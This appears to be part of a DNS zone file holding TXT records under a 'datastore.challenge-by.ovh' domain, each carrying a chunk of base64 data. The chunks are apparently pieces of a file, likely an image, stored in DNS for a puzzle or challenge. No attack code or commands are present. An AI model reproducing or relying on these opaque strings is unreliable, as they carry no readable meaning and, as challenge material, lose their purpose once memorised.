HCHYMZYQZ2AF46H0PD5I1GYG.datastore.challenge-by.ovh.  604800  IN  TXT  "uBqYrzPquCDYedslwYcAXiXa4cNoccGnzqaEXzsCSOMkgMUjTX1y9Ttow/lwGUSuEizHANC0JWuXJgZaAG/+YwAcGABTFkwAOJl5zfDbLZov2A/MmxJLBv+R39a6CcfG"
HE54ZY370ZC1YWZ3NX3UG49E.datastore.challenge-by.ovh.  604800  IN  TXT  "dal6MZsqGFRGRmUj9LhoGPqoUkC+Rxz4AeNw9mvYk2duA8AsoiQwLw4pdJZqHoBZBnCtRbUMu/BA6XdMYbY5t2I5eWsPXmCBBccV0bVpuLDhIKsqUqdf6sWmhAOmFLZQ"
HE704U0S6K5I99SCJ963XTFH.datastore.challenge-by.ovh.  604800  IN  TXT  "J/db+lxRF6djFMbo05Tfi9xOqcBEZYLKutTRDo4H0y0exG2kyIg9C1RkgdmwMu/CAuH4XS1YJkjp6SMpBHQT2dcAAJalAaHSrVwn+yrut1Cb6CSBfBpkmpbu51gmUZC5"
HK35YT6UBMQB50P8VZ8KGSQC.datastore.challenge-by.ovh.  604800  IN  TXT  "l3bzY1CcpRwTnSb4l/guDaAGvuYM0PJZk7ffUl0A4IorESjUhI8BWFIwIABY4jwcElzl+o61OZ2ZyzHh/LNhezkDYFCuXiIBKxSGw5T0uQAwQwDS7SKigJ2lC4BfDIBh"
HQGX8MC5NXBG921V9HA13E8K.datastore.challenge-by.ovh.  604800  IN  TXT  "YsVytve+dqQLmkqQ3Z3FAIIxRg5Nx5fioJJGSiFXeFfaKlF6lAlnd+a29pNEG5Ri8k0KkddSoiBT9MmIx5jIYZuDbmsAqVvh0kd47dMJf7jJwQEWR97bjnTN56QXjiGZ"
HSYSSV37NC919ATWC0JEZ3QR.datastore.challenge-by.ovh.  604800  IN  TXT  "YgeAg/jKskzRrviiUhZAXIlQ9HmvgAwz/ETPzTC8fNAPnXVQSN8QgDcfgLAAmNUAfhWrlk+xMZue8C85c299WaQj3fLY6AknYC8Jy0wNADYEwJQBUBcyY8X9hNIMQHkj"
HTR6Y8XHK3YN7U1LJNEYBNUE.datastore.challenge-by.ovh.  604800  IN  TXT  "5ToIfVhxv0E9XPkT+ycOGtzJ8AhN8c/t66C/I/RpuOMA3LVsFoC+3Xuicqk/6+5HjnrBrz+1akdCR3pVRtbixPNJmHtd9BglmFI/PrcAhkyWZuOoajIzT9lOU8JcmW+B"
I3QX45U0TGVOZQI8749860X6.datastore.challenge-by.ovh.  604800  IN  TXT  "fbF5Tt/AiFEDgP1dobcosRf3CcA0XpucmuvC8CGAamtpKoIbRlHjQpShn60jrZWh53Wk5fYDHelQPyv38L2W9JDlZMPTkfZD9Ek0N/qeoSTBieEkx8oDkHuMQbMNCkDY"
I3RL6FK12VIB3YHM5Z1OM8MD.datastore.challenge-by.ovh.  604800  IN  TXT  "PuDcSXGhGNo0vIXJG4a8I66M4cI36NMoUAKlKgGYbe4yfeoBGI3MNQawOJVl6DkdaX0ej+lIX3QZwHy3wqswja58C1ZHujKvI32U83WkZRSSfC89lUvqSLc8Wn+OtaJQ"
I8DGNV0DTLEBLQESF6PYLB4X.datastore.challenge-by.ovh.  604800  IN  TXT  "NNYAthnA7Wvrwpxfs5Me6OSsYRPKHa60eZZi0/A4ov4YO1eZNrvtzQ5TWAosYEwJqhxL+uVYK0USFeUOwGptuWLml5h9F/6wjjRb4Go3Z3Sk86IjLcpFczrSJ/oVfR3p"
ICRNZDM11W8CBRKNV8VYWPGJ.datastore.challenge-by.ovh.  604800  IN  TXT  "vJeGex59QN5LZ0cnzU0/asF7dXGddOFiMKzaJEIPLne4lFObpiYPqUwZKNgaFzlMNdyjPSkR8iksIgDAaFQcRx6APGpXLgZmVvfZZuo8Lsfgl7Wd1/Uo90kd6YKnI739"
ICZES07Y9W6FNUL301616RV6.datastore.challenge-by.ovh.  604800  IN  TXT  "QEd606xQb3s60nWtI518ryUrKujpSBc6C/gsmQOfp0zmRIFHvhg5C9Q9bzDe8QAsC4DRr9SSpgLoGWm4MJpeqgMbeIE26pYflZF+xVKsNriAwnWpMuml1pSzwP8KgEZH"
IL3C9ZFD7I9XG4PG4AKZ5KQZ.datastore.challenge-by.ovh.  604800  IN  TXT  "+vjFOtJdM3G3O9KejjRbIOtIH/k60p56m9OR9ndjrH5gxw1G9iw9v0FFIRoqClYAMBt/JNPxAAzNxK18bupimM0ZAAxBdqWVccYs9q1QMQf9Jnb/QtTj1N/xtwPQVEU8"
IO1ZKIBAK5G7LXKJD08UYXZN.datastore.challenge-by.ovh.  604800  IN  TXT  "vmFd+EJXhKFQOv9btXqTZkf6ER3px/QDeQnhRTrSBasf6OtI+zvSRsGy4Hgia4Hq/HtQnMY46Z/SISDQ95sNByBi4DJo1cOUFNdsgTUACD7ZOCN1yOVvV1hBoCBa7t4h"
IO5UXKNUP4VOQ2077M9GS5KS.datastore.challenge-by.ovh.  604800  IN  TXT  "RsKvxXrboCDKSvONyqxzcJPnufCxAKjVJY2285yC5ZM60oUX6UhrAcbke7n9QE9HetXjOvbMLyhHzFRhU++mgYTLPHI6dgCy6ZycXXNdLCMPAjDNAPJYVwOI/BHv6uk5"
IPB9KKPXBORAW5Y1U4LPQFR5.datastore.challenge-by.ovh.  604800  IN  TXT  "1p9RQyvZBkSzQXlqoCxpYb6di5QZhOLu0zoDaPRN/3Ed6fzjOtKLZJBX3FDJWGBVWtg0Um+mDW8dNMktS3s1XmcRJwebgPnG0DQWaG2vYGFcZJuuloq97jU6FsO0ErDx"
IQY8P4YWAPUTV9TQR8GQV2CQ.datastore.challenge-by.ovh.  604800  IN  TXT  "lTFA+q4OPNrMbDDQV9C3FVV4khMAgcLKUe5PqPj6MshOxffQU/HNLVTxXSSD3PJWTzQl3bjT7PtHdBkWQHHZtGsW4pgSanakt9IIITQVhPjFndnPRd1SvIUdM92leWax"
IU1GGRU505P7JY6H73LDVYJ7.datastore.challenge-by.ovh.  604800  IN  TXT  "8GHMCaOp5icuBOCnZbfLoHoegPmnAczl/jkd6UUWuOONhsdRgkNBl1qq8sJ803LQmk0I0a6GZKNZadKkRm5xVQ3SQQNY5YK7hLqZV42yMsc7/7407Em889dmzPXeqeEh"
J4SZTLUVJ0XMDCRGVM0OC49S.datastore.challenge-by.ovh.  604800  IN  TXT  "AAAgAElEQVRw0yPH1benAORYhh/A5f61Xziom6XSlb8SALIF8v+MQQ97AOL15O6DeusvY4H8yrKtv7Ge96Xg53WkrzyRV7HA2JQoaak9viYANLPbGkIf4v6WjmZbIAd5"
J52WMBHY3URZDAPDFE3XW5LZ.datastore.challenge-by.ovh.  604800  IN  TXT  "glTdsQDKl8EjSlW7XbaobXbD9u+mf97EOaznXAxc2Z/Xds5pRUDzhymHpr276R5zjzTn7ykk7q57B/JLFPQxC7PwmelEJoaSRowvzcC+86St/VmWvs3l3prpGHVdBo3F"
J9DG1BXTQWTID06QSZB1OOLM.datastore.challenge-by.ovh.  604800  IN  TXT  "fRuwc2cGcv7S7lZVMd2Qp/iohXGsfjdD9e1S5XJPZOHXY2NOcg90pAv+6tPUDjL6TfS9Pd77RvcQcwycpZwLI+S1yeLASFGtx9VyjMHIoElYmmTNay7lWK7HTYta9LwV"
JAV9EIIFHK4R3GMO07RTMRJF.datastore.challenge-by.ovh.  604800  IN  TXT  "dQTM2ADYc3VgUkf69QC0gdHpSK96MxFhVHn39ksTe/I/P8L9MHbj3pcd2dBVVLVkmlswvjtw9mBquGkjhNt3DsCR2KfceM6O6/zvw9S6BtBoPEt34OtIvx4jbXthpyO9"
JCHO88YYQPXUC8ZEYWODX601.datastore.challenge-by.ovh.  604800  IN  TXT  "4u8HMqOKTdFSHMHm7i9l35sAhEF+KVxZADHGTDexS88hc/lwxJweDHV4BuO125RBtvoi3OaiYeNYA2g0nvMPdKRf2QL5fxSqGx3pFV/ony1QiZlx8qWsinlSsadAVvVU"
JH0PEYKR4AK13NEQTFCUJNQB.datastore.challenge-by.ovh.  604800  IN  TXT  "K2WJOoqUa9voGCRPLKEzi/R1M3sSkvCo/Tx5hIWxUJ0ZC0QuhdsYbWdzHq8JoOSsU+HRRDK55S2Yz2ahziHgpKgA6efBYl2jYNnGX9AxOgaC1C994vzQEK0yCol0wua6"
JP7YS5JU3FB451035EJ6DCCA.datastore.challenge-by.ovh.  604800  IN  TXT  "qehGy+N25W9eIkrGtaHtDVa1xvPF3qZoO2s+8LUtEFxsXYjIamKuOWEA0WMwJ4W2DPEty1bHXRyzCRpAsPVij/FX25mZtV6DMlV0J+qZG5thMgDy7/8rne//tkSKYYsL"
JVX5VNXQH1I6245MH6O9K08G.datastore.challenge-by.ovh.  604800  IN  TXT  "m6IuYc4jt+LLaGoR6VzrlC7rAjzZbIFvnNqLGRKcn4ITPe0e4uIWDvxfkXfWbQyck0yumy3VjuFUTRVDtR4D2PxqNl2QX+95od7sLvNDGbRj/+fuep6bRrKw6IWsfUNl"
K5JZMDJK90C2CJ53VQKK4PTX.datastore.challenge-by.ovh.  604800  IN  TXT  "xUpuKjGAc1uPIYIbSpR4ciMEO8ltMyEmcxuPTExuwgyDciMhzJj/dvq97pa6Wy1bDkxt1aooSGLZxJ+/fr/69fe2JyIz40lGfS/PZLvjOYfnAoPwBB7/hyGSln8tbWdE"
K76PH3EF80K4EJBHJ61C0Z2H.datastore.challenge-by.ovh.  604800  IN  TXT  "6u6GeB93Zfk+v8Uq+T/C1+/gq1Xfp7G471/aNsnuuuTPfeHf5/fSS+C3SpRXvJyxK5dXAw9FTR8B5DaQZ61gEnErCOzjZylAYeEeUvDDiBUK36TWxX7evFp0vHGpFYyF"
K9JDYG2RTNKKD0XX6HNEOM1Y.datastore.challenge-by.ovh.  604800  IN  TXT  "3QPurQ8APt+r4CZWlLfre6EBQAdxmFQCsKHiNxtAqWeCfnHMGQhL+L9YgyYCwOdYqTrl56B5SZW55GDzIP0QiLd/NnhtWrXxbAyD7PgdfaHBoMfO/1ebDa4B6N8rBbAa"
KC9QHYN50349UKE1BYYS9XG3.datastore.challenge-by.ovh.  604800  IN  TXT  "A6/86gC66kmHY1aBguoJBnOstgf5LXY05/25rJkoS9jGWQsh9JqPq+g6SX04cJwi5tso8XgbpVvZMTOYJ7c4gH77mxi47C8AYDM/jCu6pKH60no1YhEL2/+lAGJveDA+"
KEBO72UK8ZNIVMCI4UBZ10TF.datastore.challenge-by.ovh.  604800  IN  TXT  "z9qLoDy1JqgmH36Nx5XDPpwvwLUXO52TPqze8K2PZxyrzBXObWDuRsAG30YAPWxlQAD3qDeDshWNtXo9RPF95zUchev8crhH/+fD3hf6p0eDYA59PXu909kAbvGTzId5"
KQ8PV051LXQYT1IS2XV2CGS2.datastore.challenge-by.ovh.  604800  IN  TXT  "TT9gjd8HDDdWDOA7I0EgCvjoY+TzMxUDPbkrPYi5aiWKLX+dJjgT1/nked5io8FXuNljRomujDWEgf79G7AKJWIf4IMT/2G2Qlv4yBEQ7h1/LsHVD1VQiWI5gE5Jd5a8"
KS9QCC3Z0REWEF8KACMEJH3F.datastore.challenge-by.ovh.  604800  IN  TXT  "qxTwfozaIW9xxPLyUowZMg0HoRCNzS/BOVFOcFVJL7JEmEsUAVVhXMQUl6znw1zwqKmIBtftaktYal2g/tYPAcAWAOgpAJICgG0AUCCE+DZ9+fOQATQx8Bf5rCav6WNu"
KSCIOH8L7H94V6M7T4VJE050.datastore.challenge-by.ovh.  604800  IN  TXT  "RlgVj63hJfZF63VHimMO/6wa4akSJ5x4cQcGFSJ2lHI+xa81jLqj8K1y1nupIoCyq/nZ93dLANQYuMIZqAC4wkxAZQAPpZFPX+XDfnxj7JwDGDyGXujRaV5snn3oPzCE"
KT1BAQP51Q1KW72MNI7R5QFV.datastore.challenge-by.ovh.  604800  IN  TXT  "fLEg3nqP8Y4mgBQ6ko8FH2lqA1VMINjAoYrnrWwJV2LgOxnADcS/IoDylhweqO/knUMsm8DeZzy6Oz7p8ypWrLTuV0px40DI9ALvvgJ2oMHgK6pnMOdFXcFWuzIDG32Y"
KUTK77RZIEYPMCWNT63QHN7H.datastore.challenge-by.ovh.  604800  IN  TXT  "x/OavWUEsNXpUAuFjpJkDLzf6UzTTxzA5sXXznp8QRceFCiO19EGbjA+n8HL0YRlNoANRTJBVFSDsyQ/ozp+wTNb1vAyPrCU0xDSUeHYGLnwtAL5OgDsQJnf8xRPkY3Z"
KZY7ETFESBQQ0VHYQEDKULR0.datastore.challenge-by.ovh.  604800  IN  TXT  "0FdwJRPIbCCPZSiZHA6gn1PrRcZAn69aBDAPYzyezzwE1sIjvCd+dw6ATfWkq2jyhdNGwsLR+KXFdxtZy+OgekFF2Dv6UgNm7yzfgB0DEMRFI+dKeeyjXZmBK9nCdEgp"
L28USPYM1755QCNJ2LGO4GB2.datastore.challenge-by.ovh.  604800  IN  TXT  "gJMyAFscwHscQIcYADR44a1MlYpBKFpaxtLhmrOp4m3H89IMWc2uKxwtH2vg+R4p0fTxjigBh8vqw7t2ZRsoouldE4BX8xjY0hi46ldjoCp80ssGAcjnCINgHC902DrI"
L3CEA6P29H8Q2FG9YLEQBPU1.datastore.challenge-by.ovh.  604800  IN  TXT  "oxSakyF2PlKPiXlrV5IPOehGylRwenO4MAMpZhKAl1UZ6GkMfLYogF/6g2AUhU5ggGkcV9d1EvYOigGwaCl61FeQTEAvFQMM01QeFIbjXKNR5E4WD2JUG5gB+B/4n3/n"
L7LZYV83568GCAT8A1528R4L.datastore.challenge-by.ovh.  604800  IN  TXT  "U0iu/PsQY4YJuH0JQPqJpfQ/+TWtR9GvMgM3KgKIJ4Z7/YGQF7A3v0GJKIhFhDegnhaDlFoqdJSFlmiuZybk9tgjMPG1G+741sJBTAkDMaL2+OWzL6XQj4cxImR28jrE"
L7Y6VB85U1BD9D681Y756LJS.datastore.challenge-by.ovh.  604800  IN  TXT  "LAALOtLuYe845s2Y+OPNm4KXOVo0eGktIRAcU3C4kJ5QciwAyTUe/8IgUFVMqh1pYs4lGs93TQxkKUmh0DUHwDkM5DrSvGq72RtCTbLZk3SXN8vqTkGJ/UPWjbp80R5O"
LFOJH95LOF8KQO1POAWYG44Q.datastore.challenge-by.ovh.  604800  IN  TXT  "02lCIDROmIqo5dVM028taSRpDadN0iykG2pBYL3fw5q985h35/awj9k5UXWkZzBwDoArizGQ78qBwLKsu/zm1SYTFh2d7S/GQMG7LMJLKe9qxLMEbPA3jDRQh7daysBY"
LIGY5FTUR3J1AGF0LBBF5YWP.datastore.challenge-by.ovh.  604800  IN  TXT  "vBX0WKkLeaLGNxdC45kJRjcG0WODjnSJDfxHGMh0pF+pusvHsu5yw1wlLvcWmJYB76AckFLw9JHOMxkoZj7TGAZdiOqg/2Qaz84jtisHesP9sKAjXc5Az0L9JRwJRSQA"
LM9QY3UB5D7MF8SH3OGUI6E0.datastore.challenge-by.ovh.  604800  IN  TXT  "nWWf2pc1uQpR0QYadaRfyrrLrsHHxoYoZTTCRXvCUwsrpVkZycctk3IAEwOA/p3I4EJq+6L5Jd8XNuhIl9pAG3PhUfQT3xOBDVcLxzehS46SFMpOydKCDJytu+wa45RA"
LOEZB6SKM25HBW52WI97P6IN.datastore.challenge-by.ovh.  604800  IN  TXT  "X7QxRsdfKe+g5Y3GeKlRurt8Bj2Pa9gNE0iDC1mIdfEqa29+yZeKbdCR5gxcNQG4AQHeCq9I59eajNl9EwPFPtVRkYGzdZfdGf0++aKFKAXIlXi+lehw4A+miS7lLeI/"
LP4C8AT16YJACTX8LYZPN1IO.datastore.challenge-by.ovh.  604800  IN  TXT  "AwPZ1PpwS3UhtS9t0elX7JGWdKRDhlAje8sqgKEBQIYZMQCoZSL02UUGztRd7paaPR4es/on9RbEovT3iIKPGF9A6m+SOQyUAbSgDjOy1RjGqg/aom8SN9abor1NfOy8"
LQ6GTTOMNK80O6VXT8YA8KKC.datastore.challenge-by.ovh.  604800  IN  TXT  "Oz/k9cArQS4jgG6RgcTMQMzr+PbTA7vohWfqLve7Rk8LXwzEooUpenThKgTTVixZapQx0GADExZEazGM9Rk3vxFApcFS15FGhOi3TTzcvSuqMbOWMGLmygC6GgPtHXi0"
LRSDFEBT8TC8WXK6HPGYX8LW.datastore.challenge-by.ovh.  604800  IN  TXT  "NbTlemuJjjRriWW6y/2x5iy6bGIUXcAHEAOnFs3LiIAhzXyEl9MMAfzoSgyc54VrLyENtk+1Gk2bSxQrADaLKr4IIFQdXPqbDrN64DnMUKPOYpp+hP5IitC/OusUrjiY"
LT2AJXH9PWTDWT5OYMARO2VR.datastore.challenge-by.ovh.  604800  IN  TXT  "ZAx8EHcmDEA7Hz25wVwzvPGQuXjVBs7UXe5HymQAIB9NLb6MuqPoFI5F1whhA9FzgnEbOGEoeQJALCxDDFhgoGepbpr8AYXAqKnFMHdsE4CNEgBvqZndO16RxrX4A1+j"
LUL3SDFV84GZ98UM54UP740C.datastore.challenge-by.ovh.  604800  IN  TXT  "6F6wIi0YeDv7Rro2JMTQkecF6vkM3LOFvetC9VgU8XbpJ7k98WUeIT5Tjg8EMARRYqGMde1wAClSU05RARwRw3EYrqT1ykjAj0KieD6ADW7V8n3xdgFAVwZQMPAHrFFr"
M0CXQDIK5D4XNJVG2DBMJ2IV.datastore.challenge-by.ovh.  604800  IN  TXT  "AK7ynfmszO+p/YFzdJeFTozYLUMl1SXKcNRV1WopItUFjXNOKATUu86nCokkWKvC1MSi9wUBNQB32a+XA1juRMDi56RZFrty8xn4bxOADaWfZEX+cAo60kO7oLvsRlEn"
MGMNIDJF5JTLBYRHEJOYGHBL.datastore.challenge-by.ovh.  604800  IN  TXT  "fMqwy4rHEKeF7qdWPpRAiO2n+rQC9oMj5yC7QfzL5htI/+IzklobFPkLBLxoM+wYUoUeaUlHOsR9uJZ4z+6E+YX5DPThkeIShqLhmihEgmd6qPdIh3N0l9fDt7BtQQgh"
MHM3DD88632XLF7GBAK8T2JA.datastore.challenge-by.ovh.  604800  IN  TXT  "0rxIGNOiwZAVVVIJSZxfDQCmhhsU6Bkn/7JhK6RAwA9hpvEsx4FbR7q2MwAIWYjHK5uEF6IRwMbxMXWBx4MiA3egfnwIf+1hTWAdRiydHR8xI+i3uJ4s8eU9Ol1HulR3"
MJEYS110Y34HJNSDZTTCVIUX.datastore.challenge-by.ovh.  604800  IN  TXT  "eZloIQXumDnPPbbwalaSpPKCrNHva9LCpHQ4VZwuvQGfkT0zrdGLD1sf0Zc+VbM4q97PNZ5FKtdnvzzKEyupXBbSye1ZCOAG39YcFhj4My9C831hF/3QBK1fU61ArGld"
MJJH9XKHEB3G09LPMXJLKCF4.datastore.challenge-by.ovh.  604800  IN  TXT  "+gXd5T2D7vJzfccHKbhFfKvKRWqPnFOv0p0edCOM9CSEEvA1A4/lnKyYAGdz90Jd2xmvn5S3fNsuAqgzUFTxeWcCix2v2HL90dxaVNCRVnWXG3thrru8U3ij1/SNFnhS"
MLT7M6XF2NN34BPIG5LF1KB5.datastore.challenge-by.ovh.  604800  IN  TXT  "dq2N9MpUyeXfwZnuWiE1S+Me4eHybIrUPp49tzUd6UJH2po9D8C1HMAjA4DORHq1JblLn+tI9+fqLitTliyx1MLGp2oIroXhE1KFgNRYQh1wR7+5zpboCRdxZibbORlg"
MNQDG9BZBW34PCLSC6WYGM8D.datastore.challenge-by.ovh.  604800  IN  TXT  "JXjzRNWRRo5+yidMD00AuiYGPjMDaDdyBD/I+1qZjjQvhWeSyezHYmMkps95W+AKGHv7nFQhFowZPydVFvBnG+uA+vAIqASy34zX8NkH7naGyo+5jjT/rUUGxd8xTWm7"
MQLG8L9OJLVHA3CMA5K11OBQ.datastore.challenge-by.ovh.  604800  IN  TXT  "I4TJHeABicF674TS86RPncNJ/woeWQYpOAHgvW53IiJAJ0vH5grvlFzKrD5GlrbTrbiIwWKeV7mvPkQCPtVftG5/+8UNmadsH/vStqaXx42XcjVmQeWisuu08G4h4K24"
MQZQ8DW4YWZOK2J31J6MOYM1.datastore.challenge-by.ovh.  604800  IN  TXT  "iJcqMdCnOQjgt1kY/3L9PwPw3qLaWaXXctFeQShjv5nMX8RkKYp2SAUPjAu4yOra8P+AgYVIhi24yHkCZjDREjNLSdDIe0cEJqJ6lU+mE3cm1D6DBw6LdvW9/f0A9IsA"
MUXY3Q0EU94BOYQOTCOW2540.datastore.challenge-by.ovh.  604800  IN  TXT  "7hoAdL8/gKvF7pX3kBK7B37WXyASjZrUZ5CwTr8tou2fJ9INiGO9jc0cjUTHr9b+bgDWZb1LmmFgAtTOAHTB5TAGVhLqXwjAQiRjQd2EvuPtxEsv8nlp7N9ptl+eYqNV"
N7MZ0Y4SBP7PQ9KASC12IBYW.datastore.challenge-by.ovh.  604800  IN  TXT  "KACcKrhZWUqXpPs2DJY0uKU/bgTYMvscCE3jrshtpUvfIzQOJFbeuisAfKa1+FLnmb8KPJF9c3kjAO1zo9eMqBlMpL1LltuJjI1VY7yPTrSNAIoH8o4Ekdy19iEHhhCw"
NLDJUJU9VWZGCYHJJ1CM9YXK.datastore.challenge-by.ovh.  604800  IN  TXT  "QMCjGwGYbyrRcO626aRSEcC7Wouvne2s3JJf8oYAuknR7L8PoYfvKckA9GqJsieC40zJtRNuE9X2iRIsm3dKoIgFG0mbhQVs3bH/CQCdEgDbFQB8dxMvbBuCafTE1Aw6"
NM60ZI4NCK2C3MHF7YEAKJ0A.datastore.challenge-by.ovh.  604800  IN  TXT  "B1aibPsSS9nWhLyP7XCQfBfzb+aupjtxI4tqOJlELHWottw7HfWXvQvByOld1Mgm2bXbNrGXGBvHS2ICk51M4o60oz9wi3879V5VSSWpBDLGPaPTp20kjOByq+rVe7du"
NQMDT0X0V2MYCU1A2BHNOZGQ.datastore.challenge-by.ovh.  604800  IN  TXT  "4V+E7AkVOxwQbMAn+aio+38H4IoMVFCQNmIIp13zComTrRnpMYDJ5ojpciZLhlWs6g5oiYDLOQJ+u+Kg8YSrDyhmU+1vw/geil8SgPCFblEAPUI8+lzRB3bdp5k+EOvv"
O16750F9ISPSBN6ZL6X8I42V.datastore.challenge-by.ovh.  604800  IN  TXT  "NzyUq8gMvC+ACgpqNPYABNsntpXfQzyuyh15XmuSqaP74mmBb1fPWQe4lw8q9YMVyKfpXCzJRdIEC+41QEJHAHWtijUjw9iEO24TV6SzEKOtpP8g7rskgeWyl1yVgUoK"
O1VEMTCSXVM3EAJC987MPM7D.datastore.challenge-by.ovh.  604800  IN  TXT  "Wp9ceCOtqGKlAJTrwrB/ZMxALcdATaf4QQTTUkxrVukBhcjqLEUXPm7wlrgtr6tLiVLtTMHzTM4A/vAgBqooWMHhk374qGLrBQyEfe7bagbS/k8PIYChHaCp6ABX6gE3"
O2EO32YT3I4FL12N5EMOJMAX.datastore.challenge-by.ovh.  604800  IN  TXT  "eVBcGsDt0gCePYiBKgpqNvZfwEFbL2IgBdAsYCANbi9hBjd0aQeomEUbX4+BbqyETgH4LgfgqqMwZHqVSdAhYa24iIFb3bYAMMtAOn5cYvtVDiArxoCbXDCeAxBEsgUM"
OBBR8Y1NI9O8V4LHTKAOJ5W0.datastore.challenge-by.ovh.  604800  IN  TXT  "PAMABQMtkAvg8RIKwVKZ6QfrQQxUTEdwIBkwDp76tpVjIABYL2KgDpIrDwdgZVZitVkw4RbTCCCWDm8StQECeDQe0g5J1xMGmnBGAPjBE0dN1875q0XBP/jSKFfgAAo5"
OC1QX4PDE3UQJTEFF2O7HZ20.datastore.challenge-by.ovh.  604800  IN  TXT  "ZuYNZE6L58PjX5RpFFiXShGk0YytUiZsDbwh16qlGWjrsx3GPzohVHSA8RCcfSvGwjeeam9JVUSKELtsQLDcmIGp9EIqDjyIq5u53JbKRxp+sgS5KZt5GMJg+a0aQTaP"
OFI9IL4H3GF7UUV9E6GU2UPE.datastore.challenge-by.ovh.  604800  IN  TXT  "IE22l7hmxUU6QIwykAIoX0BsLUu/c+lXOi7CTws77C3UuB8MN3EWHs/EwTQD4aeFf3RZAH+PARRt9Kf7AUiUPtIURyadbvaYsXKH+S6bDn6KJ+pUHiJBEbw+nWBEKLIy"
OKG9FCYGD9OGZ5Y8RWK0OTZY.datastore.challenge-by.ovh.  604800  IN  TXT  "HEA635uml4EAA6uH8FdDwE+Zl9Xv0t7OrU4DiyDC49lhZiUt5hsj/KNXAPBhDMz4SJOexyo4l4xzDvNdNkYDtq2sX4ggtESjfQXCcqle7jMGepEsQKCn9XB2CV3KsO0Z"
ORS6J61LLDRFHVOEVWRWOTZU.datastore.challenge-by.ovh.  604800  IN  TXT  "avy0+Tkz8nOGKFqEtzJie9Qyj+cd3HlVeDubl7WHMvDeAKZ9pHmB3yWxdLpZT3yXCVPN7B8XIThk6SgyijTN12MFAtbV6fkoJVnwg5C2Tg/jPzJS41cFuqFglhWooQCM"
OWQW5ONX9PWF1J6F0OCMDFIW.datastore.challenge-by.ovh.  604800  IN  TXT  "Vesu9yPme/9yb2fuHw2tJGTJPFFLO+zjRlZ3qD+Yzz85vQiOu74ThbdOD+Vt/wngjONMWNqQHh9g9fSXuChlXDf4FupRN6NMYBpp4bvMDZoRy/1zyXeZATiq/1iQkH8/"
P5AGEFHANR0XNA1V16FQUOQV.datastore.challenge-by.ovh.  604800  IN  TXT  "JKwjbF9Fmm1Jgy40YW+arISjcQIdPWA8o8MvxU/Z/2l6J/F2RgZiNRh8yQeisIkAIpYdV6oL531jROTyhmeZP8bqaVHWPJOviPxBhnT5ZILCPzAG8JAVWhPfZb65+8Cc"
P6E3W5R1LPM6JWXXSKAPTF8F.datastore.challenge-by.ovh.  604800  IN  TXT  "FiB4u4M1Dc8g11eBZttxXIwMZKNwBeDT9FkP5vBAPxh41HWp97WekfIgHnXZV8w9ng1p/3Ojn9FIp45B3NO94YWiDIDbfI72jWyEItWFCwFUOVhyAIU6C8/IALrGnl+A"
P8R6SKFV5IUWDHVSG673HJQB.datastore.challenge-by.ovh.  604800  IN  TXT  "IG2VmJSibfP6IvIxc1HhDMRRmC3RCGaXHvR+bYjKaJ+pxk/vZryduTqrLjyeYwBVGun7ASisYl6VA/Amrw+UfKQ5gEIfmPguI4DYJf5WUFaz9UOPsLDYIO2mWMhvYxgz"
PIL92COBFSB77P2IA7X2CBPX.datastore.challenge-by.ovh.  604800  IN  TXT  "YWgG886ui/EoNt/WSYG+Rg/djbS3sxBYCo9nASD3di4GUBpr8034GWBWxMBME95UMjDr4isAPJIBPJcBLBiJoXPTbndcDKo9bKIOW/6AAE5hg/ZZfxev0NYLTPWa0yJp"
PLMPGXDVZURQPGP19CT1ISTR.datastore.challenge-by.ovh.  604800  IN  TXT  "w23Hla2JXQHgXld4PAsAlRLfcD6FsSDCD3wHurUJeCa8ns9RjIAw/RuWBX2GoeJTwsAr+Jv34LBDSdM8hlVHbO8IY9Rw+Lh0o9RIZwAUEt9mGkDWdE6Ka7vhIQyuGNzh"
PR4ZEG9WCTA0O0PKM68RBMNK.datastore.challenge-by.ovh.  604800  IN  TXT  "KHvt9C9mNFRpX3R6jTF0kISNvZSlOPdTv5B+7mS9nVMASgxUAojjxkGcUH6WJAcrOVuyJE/1PC5rpkTR20kY824tDDQuokIE6exsF5HDzpCCyNsr7RgJjZCIGHtpxNiM"
PZGVS041RD4NR1EYR86Y17KS.datastore.challenge-by.ovh.  604800  IN  TXT  "iuVxXyjp9pMm7LhJEzYTThYDODAwsSwAfCm32mIAv1MB+CYG8GXyNUgMzPpIL+8D6bv3psUCDSvsDClunGfo3kR/G4rpOfwK5BwV0w/1qBdZf/sUgCQZRJpuahBRAvis"
Q0JWAJMEN47BSY292VDF2WD3.datastore.challenge-by.ovh.  604800  IN  TXT  "HICvygH40FEY2s+ffrFEw9bCQwYhIxuCBmC2GZBQiLg+9ReoM6v1ZIeFX9Oj8B+5UVi5UinPQM4dYqsBPFsA4IsEwI/5UbggDjR7chw4kOJAvLYRLUCQDgzhbNfjCSQK"
Q4OCGRM6DGLV2AS9A7T6PGYM.datastore.challenge-by.ovh.  604800  IN  TXT  "2hCQY1hS8sEA7WvF9NP0z3iPzB4fQiNNFHFgWiO9MZ/1+q/DAFcGbsGk49bpn0QRfvQINvSshvSYAIC1Pu580zuhJ4LPkK94bduf+aIY+nLj8Zm9hQ9Oon8M48cgyq0X"
Q50W0DXN8V7FPHZIJMWGNC5A.datastore.challenge-by.ovh.  604800  IN  TXT  "TvtIp2Yi4JN7JLqZZE0V+OUenywUWkG019sFskHPR3k3dAlkmwhpNy4itO0oPkJ+j46R2mVm/4jvkKSaieQUqi/5VPZfPADBEeWGP0jNhbvA1ptEkp8QNClr2vFK4lq2"
Q8QTA2BLHVCFRIV4G2CL0UBR.datastore.challenge-by.ovh.  604800  IN  TXT  "D8z4SAsAYeYO0mloK2bPiAEUexA5jelCrRUkq8JZpzEeIwtZdzi+hsAGKbrgeO+cJ8ptNotk0vIeZj4QMWYYjQAKH+kUgJN7AfhEDaCdEpgnAGYYSL9rWPjNfaRjAGnn"
Q9FRFFMZJ6T0OCLLXG4KMLFK.datastore.challenge-by.ovh.  604800  IN  TXT  "g6kQGsewZsQApE/l213t+YvlahbEzXownx/fUQJ6Tb4W264sEbpVB8k9eBTD+kBYDIJbah3ybRUYgPDUZn0xA5/ypdL3BrC2GMCcjzQ+iW+JcMGScRs8CccBNJo93IfN"
QF9VU2NA3PRRG8WUQTH7YCLU.datastore.challenge-by.ovh.  604800  IN  TXT  "7DeiZYo/i6/M0eN8ICw1WaInhDKIuAd/CxQ6g6m3G2gYTS8zw2gEUPhIC+25zMCNMgxMGbZ9XAbghtyE+8rUM2NgvNXfiJ/mACZb/jWuygjMwd6JTeUqlTJC86PUPTin"
